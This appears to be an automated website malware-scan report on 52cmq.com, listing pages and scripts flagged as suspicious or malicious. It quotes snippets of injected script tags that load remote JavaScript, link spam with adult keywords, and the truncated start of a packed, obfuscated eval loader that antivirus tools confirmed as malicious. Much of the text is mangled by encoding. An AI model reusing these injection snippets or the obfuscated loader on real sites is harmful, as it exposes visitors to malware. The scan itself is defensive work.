Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=52cmq.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.52cmq.com/ | 200 OK Content-Length: 9635 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.jiank8.net ...[2468 bytes skipped]... .com/686hk-mzvczcra/">è°¢å¨åæ强æå ³ç³»å</a></li><li><a href="http://www.aifantizi.com/aifantizi-mwvzxccr/">ç½ççåç人çç³è¾°</a></li><li><a href="http://www.bljsx.com/bljsx-mqimavi/">éç¶æ¢ 1å è´¹å¨çº¿è§ç</a></li><li><a href="http://www.ccyj123.com/ccyj123-mraaaczrw/">2013山西ä¸èä½æ</a></li><li><a href="http://www.jiank8.net/jiank8-mmiqqicr/">巴西ç¾å¥³æ§æçè</a></li><li><a href="http://www.40fg.com/40fg-mvmcmvxq/">ä¾ç½çºªå ¬å3ç¾åº¦å½±é³</a></li><li><a href="http://www.jyz8.com/jyz8-mirvwiqr/">ç¾å¥³å°æ¸¸æå£è¯è人2</a></li><li><a href="http://www.deyuu.com/deyuu-mxazxmxm/">é¿æ¥ä¸åèç±å¿å½©è¹å½±é¢</a></li><li><a href="http://www.517yl.com/517yl-vcvxvqzm/">3då¨ç»çµå½±é«æ¸ ...[1614 bytes skipped]... | ||
http://js.adm.cnzz.net/s.php?sid=252114 | 200 OK Content-Length: 3677 Content-Type: application/x-javascript | clean |
http://www.52cmq.com/static/mulu2/tj.js | 200 OK Content-Length: 406 Content-Type: application/javascript | clean |
http://www.52cmq.com/indexbom.js | 200 OK Content-Length: 2981 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.zoudi6.biz function getArrayItems(arr,num){var temp_array=new Array();for(var index in arr){temp_array.push(arr[index])}var return_array=new Array();for(var i=0;i<num;i++){if(temp_array.length>0){var arrIndex=Math.floor(Math.random()*temp_array.length);return_array[i]=temp_array[arrIndex];temp_array.splice(arrIndex,1)}else{break}}return return_array}var array=new Array();array=new Array('http://www.zoudi6.biz\/web\/login.html|ÓûÍû»ùµØ','http://www.zoudi6.biz\/web\/login.html|É«ÀÇÎÑ×ÛºÏ');array=getArrayItems(array,28);document.writeln('<table width="800" height="5" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#cccccc">');document.writeln('<tr>');var split=new Array();for(i=0;i<array.length;i++){if(i%7==0&i>0){document.writeln('</tr>');document.writeln('<tr>')}split=array[i].split('|'); ...[2473 bytes skipped]... Decoded script: <table width="800" height="5" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#cccccc"> <tr> <td ><div align="center" ><a href="http://www.zoudi6.biz/web/login.html?259se" target="_blank">É«ÀÇÎÑ×ÛºÏ</a></div></td> <td ><div align="center" ><a href="http://www.zoudi6.biz/web/login.html?259se" target="_blank">ÓûÍû»ùµØ</a></div></td> </table> <SCRIPT> var text=""; day = new Date( ); time = day.getHours( ); ¡¡if (( time>=0) && (time < 6 )) if(parent.win ...[1520 bytes skipped]... | ||
http://www.52cmq.com/gg/top.js | 200 OK Content-Length: 244 Content-Type: application/javascript | suspicious |
Page code contains blacklisted domain: www.159gps.com document.writeln("<script language=\"javascript\" type=\"text/javascript\" src=\"http://www.159gps.com/gg/zhanqun.js\"></script>");
document.writeln("<script src=\"http://www.vshinantam.com/gg/indexbom.js\" language=\"javascript\"></script>"); | ||
http://www.52cmq.com/52cmq-maaccmaci/ | 200 OK Content-Length: 8828 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.jiank8.net ...[2250 bytes skipped]... ><a href="http://%77%77%77%2E%7A%6F%75%64%69%36%2E%62%69%7A/?微信头åæ§æå´å" target="_blank"><img src="/uploads/images/20 侣头åä¸å¯¹ä¸¤å¼ </a></li><li><a href="http://www.bljsx.com/bljsx-mqaccvcwa/">qqç·ç头å带åè¶ æ½</a></li><li><a href="http://www.ccyj123.com/ccyj123-mraccvacz/">2013ææ°å¤åºæ§æè¡£æ</a></li><li><a href="http://www.jiank8.net/jiank8-mmaccvavw/">qqæ 侣头åä¸å¯¹å¸¦å</a></li><li><a href="http://www.40fg.com/40fg-mvaccvzqq/">qqèæ¯ç®è¤å¤§å¾å¥³ç</a></li><li><a href="http://www.jyz8.com/jyz8-miaccvwar/">å¼ é¦¨äºcf</a></li><li><a href="http://www.deyuu.com/deyuu-mxaccvwim/">mc女ç¥ç §ç</a></li><li><a href="http://www.517yl.com/517yl-vcaccvqrv/">qqç½åç·çå¯ç±</a></li><li> ...[1737 bytes skipped]... | ||
http://www.52cmq.com/52cmq-maaccmaci/indexbom.js | 404 Not Found Content-Length: 45857 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.zoudi6.biz ...[380 bytes skipped]... pe> <META name=keywords content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡> <META name=description content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡> <script id="wf" type="text/javascript" charset="gb2312" src="http://app.adanzhuo.com/appiso.js?l=cparifu&uid=1154"></script> <META content=IE=EmulateIE7 http-equiv=X-UA-Compatible><LINK rel=stylesheet href="http://www.zoudi6.biz/aimg/layout.css"><LINK rel="shortcut icon" href="favicon.ico"> <DIV style="DISPLAY: none"><div style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/16360978.js"></script> <noscript><a href="http://www.51.la/?16360978" target="_blank"><img alt="我要啦免费统计" src="http://img.users.51.la/16360978.asp" ...[3997 bytes skipped]... | ||
http://app.adanzhuo.com/appiso.js?l=cparifu&uid=1154 | 200 OK Content-Length: 3181 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('L q$=["\\I\\p","\\Q","\\1g\\l\\D\\s\\k",\'\\1c\\k\\g\\m\\f\\j\\l\',\'\\H\\k\\f\\n\\l\\h\',\'\\Y\\z\\z\\u\\f\\1x\\f\\F\\1b\\g\\l\',\'\\1l\\f\\s\\1k\\h\',\'\\1b\\1u\\1c Antivirus reports:
| ||
http://js.users.51.la/16360978.js | 200 OK Content-Length: 1980 Content-Type: application/x-javascript | clean |
http://www.52cmq.com/test404page.js | 404 Not Found Content-Length: 45857 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.zoudi6.biz ...[380 bytes skipped]... pe> <META name=keywords content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡> <META name=description content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡> <script id="wf" type="text/javascript" charset="gb2312" src="http://app.adanzhuo.com/appiso.js?l=cparifu&uid=1154"></script> <META content=IE=EmulateIE7 http-equiv=X-UA-Compatible><LINK rel=stylesheet href="http://www.zoudi6.biz/aimg/layout.css"><LINK rel="shortcut icon" href="favicon.ico"> <DIV style="DISPLAY: none"><div style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/16360978.js"></script> <noscript><a href="http://www.51.la/?16360978" target="_blank"><img alt="我要啦免费统计" src="http://img.users.51.la/16360978.asp" ...[3997 bytes skipped]... | ||
http://www.52cmq.com/52cmq-mazcwxiz/ | 200 OK Content-Length: 8630 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.jiank8.net ...[2445 bytes skipped]... ;div class="friend_link"> <li><a href="http://www.686hk.com/686hk-mzzcqvmw/">æ¸é¸¡</a></li><li><a href="http://www.aifantizi.com/aifantizi-mwzcqiwq/">éæ¯ </a></li><li><a href="http://www.bljsx.com/bljsx-mqzcqxcr/">鹿åå½±</a></li><li><a href="http://www.ccyj123.com/ccyj123-mrzcqxvm/">路边ç</a></li><li><a href="http://www.jiank8.net/jiank8-mmzcrcqv/">è·¯æ¯å交尾</a></li><li><a href="http://www.40fg.com/40fg-mvzcraai/">é²æ¥çº¢</a></li><li><a href="http://www.jyz8.com/jyz8-mizcraix/">é²é²äººä½èºæ¯</a></li><li><a href="http://www.deyuu.com/deyuu-mxzcrzmc/">é²å±</a></li><li><a href="http://www.517yl.com/517yl-vczcrwwa/">é²ç©´ç¾å¥³</a></li><li><a href="http://www.bianhao.net/bianhao ...[1612 bytes skipped]... | ||
http://www.52cmq.com/52cmq-mazcwxiz/indexbom.js | 404 Not Found Content-Length: 45857 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.zoudi6.biz ...[380 bytes skipped]... pe> <META name=keywords content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡> <META name=description content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡> <script id="wf" type="text/javascript" charset="gb2312" src="http://app.adanzhuo.com/appiso.js?l=cparifu&uid=1154"></script> <META content=IE=EmulateIE7 http-equiv=X-UA-Compatible><LINK rel=stylesheet href="http://www.zoudi6.biz/aimg/layout.css"><LINK rel="shortcut icon" href="favicon.ico"> <DIV style="DISPLAY: none"><div style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/16360978.js"></script> <noscript><a href="http://www.51.la/?16360978" target="_blank"><img alt="我要啦免费统计" src="http://img.users.51.la/16360978.asp" ...[3997 bytes skipped]... | ||
http://www.52cmq.com/52cmq-mawcawi/ | 200 OK Content-Length: 11122 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.jiank8.net ...[2555 bytes skipped]... nd_link"> <li><a href="http://www.686hk.com/686hk-mzwcxax/">è¡å®å´´å裸</a></li><li><a href="http://www.aifantizi.com/aifantizi-mwwcxxc/">æ¹åé¿æ²</a></li><li><a href="http://www.bljsx.com/bljsx-mqwacma/">a8æ è²å°è¯´</a></li><li><a href="http://www.ccyj123.com/ccyj123-mrwaawz/">ady伦ç</a></li><li><a href="http://www.jiank8.net/jiank8-mmwazcw/">Allegrait</a></li><li><a href="http://www.40fg.com/40fg-mvwazvq/">asianude4u.com</a></li><li><a href="http://www.jyz8.com/jyz8-miwawqr/">av.bobo.com</a></li><li><a href="http://www.deyuu.com/deyuu-mxwaqam/">aviçµå½±å è´¹ä¸è½½</a></li><li><a href="http://www.517yl.com/517yl-vcwaqiv/">aviå¾ç3333xbcom</a></li><li><a href="http://www.bianhao.net ...[1552 bytes skipped]... | ||
http://www.52cmq.com/52cmq-mawcawi/indexbom.js | 404 Not Found Content-Length: 45857 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.zoudi6.biz ...[380 bytes skipped]... pe> <META name=keywords content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡> <META name=description content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡> <script id="wf" type="text/javascript" charset="gb2312" src="http://app.adanzhuo.com/appiso.js?l=cparifu&uid=1154"></script> <META content=IE=EmulateIE7 http-equiv=X-UA-Compatible><LINK rel=stylesheet href="http://www.zoudi6.biz/aimg/layout.css"><LINK rel="shortcut icon" href="favicon.ico"> <DIV style="DISPLAY: none"><div style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/16360978.js"></script> <noscript><a href="http://www.51.la/?16360978" target="_blank"><img alt="我要啦免费统计" src="http://img.users.51.la/16360978.asp" ...[3997 bytes skipped]... | ||
http://www.52cmq.com/52cmq-maaiczxc/ | 200 OK Content-Length: 8439 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.jiank8.net ...[2420 bytes skipped]... href="http://www.686hk.com/686hk-mzaiacva/">å ³äºåç±çå°è¯´</a></li><li><a href="http://www.aifantizi.com/aifantizi-mwaiaaqz/">è§ç好è²ç·å¥³</a></li><li><a href="http://www.bljsx.com/bljsx-mqaiazaw/">è§æç¨ä¹ä½å</a></li><li><a href="http://www.ccyj123.com/ccyj123-mraiaziq/">å®äººæè¦å è´¹è§ç</a></li><li><a href="http://www.jiank8.net/jiank8-mmaiawrr/">æ¯æç½è¡«åé²è¸</a></li><li><a href="http://www.40fg.com/40fg-mvaiaqzm/">å å ç¾åº¦ç¾ç§</a></li><li><a href="http://www.jyz8.com/jyz8-miaiaqxv/">å ä¸å½±çä¼ è¯´å¨çº¿åä½</a></li><li><a href="http://www.deyuu.com/deyuu-mxaiarmi/">广æ«åååç</a></li><li><a href="http://www.517yl.com/517yl-vcaiamwx/">广å·å°é3å·çº¿</a></li><li ...[1610 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 52cmq.com
Result:
GET / HTTP/1.1
Host: 52cmq.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 52cmq.com
Referer: http://www.google.com/search?q=52cmq.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 52cmq.com
Referer: http://www.google.com/search?q=52cmq.com
Result:
The result is similar to the first query. There are no suspicious redirects found.